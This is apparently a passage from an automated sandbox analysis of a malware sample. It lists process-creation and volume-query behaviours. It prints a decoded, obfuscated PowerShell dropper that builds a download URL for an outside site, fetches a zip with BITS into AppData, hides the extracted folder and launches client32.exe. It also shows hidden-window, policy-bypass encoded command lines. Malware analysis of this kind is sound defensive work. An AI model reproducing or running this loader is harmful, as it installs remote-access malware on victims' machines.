-f't3','xe','2.e','clien'); ${fS`TR}=${p`ZiP}+((("{3}{2}{1}{0}"-f'32.exe','ient','Ncl','T7')) -CRePLAce ([chAr]84+[chAr]55+[chAr]78),[chAr]92); ${r`Nm}=("{3}{0}{2}{1}{4}" -f 'NEN','Eupdate','0T','O','_')+${r`RN`Um}; &("{0}{1}{4}{3}{2}"-f 'New-Item','Pro','
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded .('cd') ${E`NV:ap`p`DAta}; ${L`inK}=("{0}{1}{5}{6}{7}{4}{8}{2}{3}" -f 'ht','tps:','w.','php','rms/','//usherske','nya.co.ke','/fo','vie'); ${Rn`Um}=.("{1}{2}{0}"-f'Random','Ge','t-') -minimum 5 -maximum 9; ${RRn`UM}=.("{1}{2}{0}"-f 'Random','Ge','t-') -minimum 1024 -maximum 9999; ${CH`RS}=("{9}{7}{5}{0}{4}{10}{3}{6}{1}{2}{8}" -f'ps','X','Y','J','tuvwx','no','KLMNOPRSTUVW','m','Z','abcdefghijkl','yzABCDEFGHI'); ${r`StR}=''; ${R`AN}=&("{3}{2}{1}{0}"-f 'ct','e','j','New-Ob') ("{0}{2}{1}{3}"-f 'Sy','em.Rando','st','m'); for (${I}=0; ${I} -lt ${r`NUm}; ${i}++) {${rS`Tr}+=${Ch`RS}[${R`An}.("{1}{0}" -f 't','nex').Invoke(0, ${c`HRS}."L`EnGtH")]}; ${RZ`Ip}=${r`stR}+("{1}{0}"-f'p','.zi'); ${PA`Th}=${en`V`:aPPdata}+'\'+${rZ`ip}; ${P`zIp}=${ENV:a`p`pdatA}+((("{0}{1}{2}" -f'{0}','ONEN0TE','update_')) -f[cHAr]92)+${RRn`Um}; &("{2}{3}{1}{4}{5}{0}" -f 'r','n','Start-B','itsTra','s','fe') -Source ${li`NK} -Destination ${Pa`Th}; .("{0}{1}{3}{2}"-f 'e','xpa','e','nd-archiv') -path ${pa`TH} -destinationpath ${p`zIP}; ${f`Old}=.("{2}{1}{0}" -f'em','t-It','Ge') ${p`zIP} -Force; ${Fo`lD}."atT`RIbu`T`es"=("{1}{0}"-f 'n','Hidde'); .("{0}{1}{2}" -f 'Remo','v','e-Item') -path ${pa`Th}; &('cd') ${p`ZiP}; &("{1}{0}"-f'rt','sta') ("{3}{0}{2}{1}" -f't3','xe','2.e','clien'); ${fS`TR}=${p`ZiP}+((("{3}{2}{1}{0}"-f'32.exe','ient','Ncl','T7')) -CRePLAce ([chAr]84+[chAr]55+[chAr]78),[chAr]92); ${r`Nm}=("{3}{0}{2}{1}{4}" -f 'NEN','Eupdate','0T','O','_')+${r`RN`Um}; &("{0}{1}{4}{3}{2}"-f 'New-Item','Pro',' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc lgaoaccaywbkaccakqagacqaewbfagaatgbwadoayqbwagaacabgaeqaqqb0ageafqa7acaajab7aewayabpag4aswb9ad0akaaiahsamab9ahsamqb9ahsanqb9ahsangb9ahsanwb9ahsanab9ahsaoab9ahsamgb9ahsamwb9aciaiaatagyaiaanaggadaanacwajwb0ahaacwa6accalaanahcalganacwajwbwaggacaanacwajwbyag0acwavaccalaanac8alwb1ahmaaablahiacwbraguajwasaccabgb5agealgbjag8algbraguajwasaccalwbmag8ajwasaccadgbpaguajwapadsaiaakahsaugbuagaavqbtah0apqauacgaigb7adeafqb7adiafqb7adaafqaiac0azganafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaanqagac0abqbhahgaaqbtahuabqagadkaowagacqaewbsafiabgbgafuatqb9ad0algaoaciaewaxah0aewayah0aewawah0aigatagyaiaanafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaamqawadianaagac0abqbhahgaaqbtahuabqagadkaoqa5adkaowagacqaewbdaegayabsafmafqa9acgaigb7adkafqb7adcafqb7aduafqb7adaafqb7adqafqb7adeamab9ahsamwb9ahsangb9ahsamqb9ahsamgb9ahsaoab9aciaiaatagyajwbwahmajwasaccawaanacwajwbzaccalaanaeoajwasaccadab1ahyadwb4accalaanag4abwanacwajwblaewatqboae8auabsafmavabvafyavwanacwajwbtaccalaanafoajwasaccayqbiagmazablagyazwboagkaagbragwajwasaccaeqb6aeeaqgbdaeqarqbgaecasabjaccakqa7acaajab7ahiayabtahqaugb9ad0ajwanadsaiaakahsaugbgaeeatgb9ad0ajgaoaciaewazah0aewayah0aewaxah0aewawah0aigatagyaiaanagmadaanacwajwblaccalaanagoajwasaccatgblahcalqbpagiajwapacaakaaiahsamab9ahsamgb9ahsamqb9ahsamwb9acialqbmacaajwbtahkajwasaccazqbtac4augbhag4azabvaccalaanahmadaanacwajwbtaccakqa7acaazgbvahiaiaaoacqaewbjah0apqawadsaiaakahsasqb9acaalqbsahqaiaakahsacgbgae4avqbtah0aowagacqaewbpah0akwarackaiab7acqaewbyafmayabuahiafqarad0ajab7aemaaabgafiauwb9afsajab7afiayabbag4afqauacgaigb7adeafqb7adaafqaiacaalqbmacaajwb0accalaanag4azqb4accakqauaekabgb2ag8aawblacgamaasacaajab7agmayabiafiauwb9ac4aigbmagaarqbuaecadabiaciakqbdah0aowagacqaewbsafoayabjahaafqa9acqaewbyagaacwb0afiafqaracgaigb7adeafqb7adaafqaiac0azganahaajwasaccalgb6agkajwapadsaiaakahsauabbagaavaboah0apqakahsazqbuagaavgbgadoayqbqafaazabhahqayqb9acsajwbcaccakwakahsacgbaagaaaqbwah0aowagacqaewbqagaaegbjahaafqa9acqaewbfae4avga6ageayabwagaacabkageadabbah0akwaoacgakaaiahsamab9ahsamqb9ahsamgb9aciaiaatagyajwb7adaafqanacwajwbpae4arqboadaavabfaccalaanahuacabkageadablaf8ajwapackaiaatagyawwbjaegaqqbyaf0aoqayackakwakahsaugbsag4ayabvag0afqa7acaajgaoaciaewayah0aewazah0aewaxah0aewa0ah0aewa1ah0aewawah0aigagac0azgagaccacganacwajwbuaccalaanafmadabhahiadaataeiajwasaccaaqb0ahmavabyageajwasaccacwanacwajwbmaguajwapacaalqbtag8adqbyagmazqagacqaewbsagkayaboaesafqagac0arablahmadabpag4ayqb0agkabwbuacaajab7afaayqbgafqaaab9adsaiaauacgaigb7adaafqb7adeafqb7admafqb7adiafqaiac0azgagaccazqanacwajwb4ahaayqanacwajwblaccalaanag4azaatageacgbjaggaaqb2accakqagac0acabhahqaaaagacqaewbwageayabuaegafqagac0azablahmadabpag4ayqb0agkabwbuahaayqb0aggaiaakahsacabgahoasqbqah0aowagacqaewbmagaatwbsagqafqa9ac4akaaiahsamgb9ahsamqb9ahsamab9aciaiaatagyajwblag0ajwasaccadaataekadaanacwajwbhaguajwapacaajab7ahaayab6aekauab9acaalqbgag8acgbj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc lgaoaccaywbkaccakqagacqaewbfagaatgbwadoayqbwagaacabgaeqaqqb0ageafqa7acaajab7aewayabpag4aswb9ad0akaaiahsamab9ahsamqb9ahsanqb9ahsangb9ahsanwb9ahsanab9ahsaoab9ahsamgb9ahsamwb9aciaiaatagyaiaanaggadaanacwajwb0ahaacwa6accalaanahcalganacwajwbwaggacaanacwajwbyag0acwavaccalaanac8alwb1ahmaaablahiacwbraguajwasaccabgb5agealgbjag8algbraguajwasaccalwbmag8ajwasaccadgbpaguajwapadsaiaakahsaugbuagaavqbtah0apqauacgaigb7adeafqb7adiafqb7adaafqaiac0azganafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaanqagac0abqbhahgaaqbtahuabqagadkaowagacqaewbsafiabgbgafuatqb9ad0algaoaciaewaxah0aewayah0aewawah0aigatagyaiaanafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaamqawadianaagac0abqbhahgaaqbtahuabqagadkaoqa5adkaowagacqaewbdaegayabsafmafqa9acgaigb7adkafqb7adcafqb7aduafqb7adaafqb7adqafqb7adeamab9ahsamwb9ahsangb9ahsamqb9ahsamgb9ahsaoab9aciaiaatagyajwbwahmajwasaccawaanacwajwbzaccalaanaeoajwasaccadab1ahyadwb4accalaanag4abwanacwajwblaewatqboae8auabsafmavabvafyavwanacwajwbtaccalaanafoajwasaccayqbiagmazablagyazwboagkaagbragwajwasaccaeqb6aeeaqgbdaeqarqbgaecasabjaccakqa7acaajab7ahiayabtahqaugb9ad0ajwanadsaiaakahsaugbgaeeatgb9ad0ajgaoaciaewazah0aewayah0aewaxah0aewawah0aigatagyaiaanagmadaanacwajwblaccalaanagoajwasaccatgblahcalqbpagiajwapacaakaaiahsamab9ahsamgb9ahsamqb9ahsamwb9acialqbmacaajwbtahkajwasaccazqbtac4augbhag4azabvaccalaanahmadaanacwajwbtaccakqa7acaazgbvahiaiaaoacqaewbjah0apqawadsaiaakahsasqb9acaalqbsahqaiaakahsacgbgae4avqbtah0aowagacqaewbpah0akwarackaiab7acqaewbyafmayabuahiafqarad0ajab7aemaaabgafiauwb9afsajab7afiayabbag4afqauacgaigb7adeafqb7adaafqaiacaalqbmacaajwb0accalaanag4azqb4accakqauaekabgb2ag8aawblacgamaasacaajab7agmayabiafiauwb9ac4aigbmagaarqbuaecadabiaciakqbdah0aowagacqaewbsafoayabjahaafqa9acqaewbyagaacwb0afiafqaracgaigb7adeafqb7adaafqaiac0azganahaajwasaccalgb6agkajwapadsaiaakahsauabbagaavaboah0apqakahsazqbuagaavgbgadoayqbqafaazabhahqayqb9acsajwbcaccakwakahsacgbaagaaaqbwah0aowagacqaewbqagaaegbjahaafqa9acqaewbfae4avga6ageayabwagaacabkageadabbah0akwaoacgakaaiahsamab9ahsamqb9ahsamgb9aciaiaatagyajwb7adaafqanacwajwbpae4arqboadaavabfaccalaanahuacabkageadablaf8ajwapackaiaatagyawwbjaegaqqbyaf0aoqayackakwakahsaugbsag4ayabvag0afqa7acaajgaoaciaewayah0aewazah0aewaxah0aewa0ah0aewa1ah0aewawah0aigagac0azgagaccacganacwajwbuaccalaanafmadabhahiadaataeiajwasaccaaqb0ahmavabyageajwasaccacwanacwajwbmaguajwapacaalqbtag8adqbyagmazqagacqaewbsagkayaboaesafqagac0arablahmadabpag4ayqb0agkabwbuacaajab7afaayqbgafqaaab9adsaiaauacgaigb7adaafqb7adeafqb7admafqb7adiafqaiac0azgagaccazqanacwajwb4ahaayqanacwajwblaccalaanag4azaatageacgbjaggaaqb2accakqagac0acabhahqaaaagacqaewbwageayabuaegafqagac0azablahmadabpag4ayqb0agkabwbuahaayqb0aggaiaakahsacabgahoasqbqah0aowagacqaewbmagaatwbsagqafqa9ac4akaaiahsamgb9ahsamqb9ahsamab9aciaiaatagyajwblag0ajwasaccadaataekadaanacwajwbhaguajwapacaajab7ahaayab6aekauab9acaalqbgag8acgbj Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBj Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
